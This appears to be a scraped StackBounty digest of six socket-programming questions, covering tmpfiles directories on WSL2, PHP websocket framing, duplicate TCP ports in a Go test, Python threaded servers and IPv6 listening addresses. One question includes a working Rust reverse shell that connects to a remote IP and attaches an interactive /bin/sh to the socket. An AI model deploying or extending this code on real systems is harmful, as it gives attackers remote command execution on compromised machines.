#StackBounty: #systemd #sockets Generate a dir for unix sockets WITHOUT systemd

Bounty: 50

In normal Ubuntu I used to create a dir for Unix sockets as follows (say for project foo):

  1. Create a systemd script in: /usr/lib/tmpfiles.d/foo.conf
  2. Place the following code in the script:
    /run/foo 0770 <username> <groupname>
    

Then on the next reboot the dir /run/foo will be created with the required permissions. The reason I do this is because only root can write to /var/run which links to -> /run, and its common for many apps to drop priviledges and change user before creating the socket, and hence they fail to write to /var/run.

Now I am using WSL2, with Ubuntu 20.04, and systemd does not exist. One can jump through many hoops to get it to work but they are buggy.

How does one create a folder with desired permissions which gets cleared after a reboot before any of the installed apps (e.g. nginx/postgresql) attempt to create their sockets (and hence fail due to stale sockets from before the reboot)?


Get this bounty!!!

#StackBounty: #sockets #tcp #rust #netcat #reverse-shell How to interact with a reverse shell in Rust?

Bounty: 50

OpenBSD’s Netcat implementation listens on a port with unix_bind()… basically the same behavior as Rust’s TcpListener::bind(). Where I got lost in writing my listen function (emulating nc -l -p <port>) is how to interact with reverse shells.

As seemingly trivial as it sounds, I want listen to give me the sh-3.2$ prompt like nc -l -p <port> does. All the Netcat-Rust implementations I dug up online don’t allow me to interact with reverse shells like that.

Reverse shell code (Machine 1): (adapted from this question I asked years ago)

fn reverse_shell(ip: &str, port: &str) {
    let s = TcpStream::connect((ip, port)).unwrap();
    let fd = s.as_raw_fd();
    Command::new("/bin/sh")
        .arg("-i")
        .stdin(unsafe { Stdio::from_raw_fd(fd) })
        .stdout(unsafe { Stdio::from_raw_fd(fd) })
        .stderr(unsafe { Stdio::from_raw_fd(fd) })
        .spawn().unwrap().wait().unwrap();
}

Listening code (Machine 2):

fn listen(port: u16) {
   let x = std::net::TcpListener::bind(("0.0.0.0", port)).unwrap();
   let (mut stream, _) = x.accept().unwrap();
   // How do I interact with the shell now??
}

There’s a certain simplicity and elegance to Rust code that helps me understand succinctly what’s going on, which is why I don’t want to just copy the C code from Netcat.


Get this bounty!!!

#StackBounty: #php #sockets #websocket PHP websocket using socket_recv() – will I ever receive a partial frame?

Bounty: 100

I am writing a websocket server in PHP (using the sockets extension) and I need a bit of help understanding to what extent I need to deal with fragmented messages.

My understanding of how websocket information is passed is as follows:

  1. Client application sends a MESSAGE (of arbitrary length) to the client-side API.
  2. Client-side API splits the MESSAGE into one or more FRAMES (also of arbitrary length) and sends them to the network layer.
  3. The network layer splits the data into a number of PACKETS to be sent over the network via TCP.
  4. The server receives the TCP PACKETS (possibly out-of-order, but it re-orders them if necessary) and delivers them to the application that is listening on the relevant port.
  5. The application calls socket_recv() to read the received data from the socket.

The thing I want to understand is what data that my application will see when reading a stream of websocket data using socket_recv()?

Specifically, to what extent do I need to worry about the fragmentation?


To help explain my question, here is the above process in diagrammatic form:

1. Web app  (messages):   [Message_1][Message_2]
2. Browser  (frames)  :   [Messag][e_1][Messag][e_2]
3. TCP send (packets) :   [Mess][ag][e_1][Mess][ag][e_2]
4. TCP recv (packets) :   [ag][Mess][e_2][ag][Mess][e-1]
5. socket_recv        :   ???

If I call socket_recv() in a loop, until it returns a length of zero (adding to my internal buffer each time), am I guaranteed to get a single, complete MESSAGE?

socketrecv: [Message_1]
socketrecv: [Message_2]

Or a single complete FRAME?

socketrecv: [Messag]
socketrecv: [e_1]
socketrecv: [Messag]
socketrecv: [e_2]

Or, will it actually be an arbitrary series of PACKETS representing whatever data has been received so far (which may therefore be a partial FRAME or even multiple FRAMES)?

socketrecv: [Messag
socketrecv: e_1][Mess
socketrecv:
socketrecv: ag
socketrecv: e_2]

Or something else?

I am quite happy stitching together the various FRAMES of data, but it will make things a lot easier if I can assume the first bytes of received data in each poll (instigated using socket_select()) will always be the FRAME header, rather than having to handle it as a raw byte stream which needs to be stitched back into FRAMES before we begin.


Get this bounty!!!

#StackBounty: #linux #sockets #go #tcp Why accepted two same 5-tuple socket when concurrent connect to the server?

Bounty: 50

server.go

package main

import (
    "fmt"
    "io"
    "io/ioutil"
    "log"
    "net"
    "net/http"
    _ "net/http/pprof"
    "sync"
    "syscall"
)

type ConnSet struct {
    data  map[int]net.Conn
    mutex sync.Mutex
}

func (m *ConnSet) Update(id int, conn net.Conn) error {
    m.mutex.Lock()
    defer m.mutex.Unlock()
    if _, ok := m.data[id]; ok {
        fmt.Printf("add: key %d existed n", id)
        return fmt.Errorf("add: key %d existed n", id)
    }
    m.data[id] = conn
    return nil
}

var connSet = &ConnSet{
    data: make(map[int]net.Conn),
}

func main() {
    setLimit()

    ln, err := net.Listen("tcp", ":12345")
    if err != nil {
        panic(err)
    }

    go func() {
        if err := http.ListenAndServe(":6060", nil); err != nil {
            log.Fatalf("pprof failed: %v", err)
        }
    }()

    var connections []net.Conn
    defer func() {
        for _, conn := range connections {
            conn.Close()
        }
    }()

    for {
        conn, e := ln.Accept()
        if e != nil {
            if ne, ok := e.(net.Error); ok && ne.Temporary() {
                log.Printf("accept temp err: %v", ne)
                continue
            }

            log.Printf("accept err: %v", e)
            return
        }
        port := conn.RemoteAddr().(*net.TCPAddr).Port
        connSet.Update(port, conn)
        go handleConn(conn)
        connections = append(connections, conn)
        if len(connections)%100 == 0 {
            log.Printf("total number of connections: %v", len(connections))
        }
    }
}

func handleConn(conn net.Conn) {
    io.Copy(ioutil.Discard, conn)
}

func setLimit() {
    var rLimit syscall.Rlimit
    if err := syscall.Getrlimit(syscall.RLIMIT_NOFILE, &rLimit); err != nil {
        panic(err)
    }
    rLimit.Cur = rLimit.Max
    if err := syscall.Setrlimit(syscall.RLIMIT_NOFILE, &rLimit); err != nil {
        panic(err)
    }

    log.Printf("set cur limit: %d", rLimit.Cur)
}

client.go

package main

import (
    "bytes"
    "flag"
    "fmt"
    "io"
    "log"
    "net"
    "os"
    "strconv"
    "sync"
    "syscall"
    "time"
)

var portFlag = flag.Int("port", 12345, "port")

type ConnSet struct {
    data  map[int]net.Conn
    mutex sync.Mutex
}

func (m *ConnSet) Update(id int, conn net.Conn) error {
    m.mutex.Lock()
    defer m.mutex.Unlock()
    if _, ok := m.data[id]; ok {
        fmt.Printf("add: key %d existed n", id)
        return fmt.Errorf("add: key %d existed n", id)
    }
    m.data[id] = conn
    return nil
}

var connSet = &ConnSet{
    data: make(map[int]net.Conn),
}

func echoClient() {
    addr := fmt.Sprintf("127.0.0.1:%d", *portFlag)
    dialer := net.Dialer{}
    conn, err := dialer.Dial("tcp", addr)
    if err != nil {
        fmt.Println("ERROR", err)
        os.Exit(1)
    }
    port := conn.LocalAddr().(*net.TCPAddr).Port
    connSet.Update(port, conn)
    defer conn.Close()

    for i := 0; i < 10; i++ {
        s := fmt.Sprintf("%s", strconv.Itoa(i))
        _, err := conn.Write([]byte(s))
        if err != nil {
            log.Println("write error: ", err)
        }
        b := make([]byte, 1024)
        _, err = conn.Read(b)
        switch err {
        case nil:
            if string(bytes.Trim(b, "x00")) != s {
                log.Printf("resp req not equal, req: %d, res: %s", i, string(bytes.Trim(b, "x00")))
            }
        case io.EOF:
            fmt.Println("eof")
            break
        default:
            fmt.Println("ERROR", err)
            break
        }
    }
    time.Sleep(time.Hour)
    if err := conn.Close(); err != nil {
        log.Printf("client conn close err: %s", err)
    }
}

func main() {
    flag.Parse()
    setLimit()
    before := time.Now()
    var wg sync.WaitGroup
    for i := 0; i < 20000; i++ {
        wg.Add(1)
        go func() {
            defer wg.Done()
            echoClient()
        }()
    }
    wg.Wait()
    fmt.Println(time.Now().Sub(before))
}

func setLimit() {
    var rLimit syscall.Rlimit
    if err := syscall.Getrlimit(syscall.RLIMIT_NOFILE, &rLimit); err != nil {
        panic(err)
    }
    rLimit.Cur = rLimit.Max
    if err := syscall.Setrlimit(syscall.RLIMIT_NOFILE, &rLimit); err != nil {
        panic(err)
    }

    log.Printf("set cur limit: %d", rLimit.Cur)
}

running command

go run server.go
---
go run client.go

server running screenshot

enter image description here

The client simultaneously initiates 20,000 connections to the server, and the server accepted two remotePort connections that are exactly the same (in a extremely short period of time).

I try to use tcpconnect.py from bcc (patched to add skc_num)
enter image description here

tcpaccept.py
enter image description here
tracing the connection, and also finds that the remote port is duplicated on the server side when there is no duplicate on the client side

In my understanding, the 5-tuple of the socket will not be duplicated, Why the server accepted two sockets with exactly the same remote port?

My test environment:

kernel version 5.3.15-300.fc31.x86_64 and 4.19.1

go version go1.13.5 linux/amd64


Get this bounty!!!

#StackBounty: #python #multithreading #sockets #python-multithreading Python closing socket and connection in a threaded server?

Bounty: 50

We have a Python socket threaded server example. It is a slightly modified version from
https://stackoverflow.com/a/23828265/2008247. The example works and my tests confirm that it performs better than the blocking server.

But in the example, the socket and the connection objects are not closed. Both objects have close() method. (The close method on a connection is called only on Exception. I would expect it to be called for each connection when it ends.) Do we not need to somehow call them? If so, how?

#!/usr/bin/env python

import socket
import threading

class ThreadedServer():

    def __init__(self, host, port):

        self.host = host
        self.port = port
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((self.host, self.port))

    def listen(self):

        self.sock.listen(5)

        while True:

            con, address = self.sock.accept()
            con.settimeout(60)
            threading.Thread(target=self.listenToClient,
                             args=(con, address)).start()

    def listenToClient(self, con, address):

        while True:
            try:
                data = con.recv(1024)
                if data:
                    # Set the response to echo back the recieved data
                    response = data
                    con.send(response)
                else:
                    raise Exception('Client disconnected')
            except:
                con.close()
                return False


def main():

    ThreadedServer('', 8001).listen()


if __name__ == "__main__":
    main()


Get this bounty!!!

#StackBounty: #linux #networking #ipv6 #sockets What is the difference between [::] and * in binding sockets to IPv6 addresses?

Bounty: 200

I’m trying to investigate listening IPv6 sockets on an Ubuntu Server. I don’t understand the difference between [::] and *.

Two questions on my mind:

  1. Ary there any difference?
  2. If not, why they appear in multiple representations?
$ ss --listening --tcp --ipv6

State       Recv-Q      Send-Q    Local Addr:Port    Peer Addr:Port                 
LISTEN      0           128            *:http             *:*
LISTEN      0           128            *:8083             *:*
LISTEN      0           128         [::]:ssh           [::]:*
LISTEN      0           128            *:19998            *:*
LISTEN      0           128            *:19999            *:*


Get this bounty!!!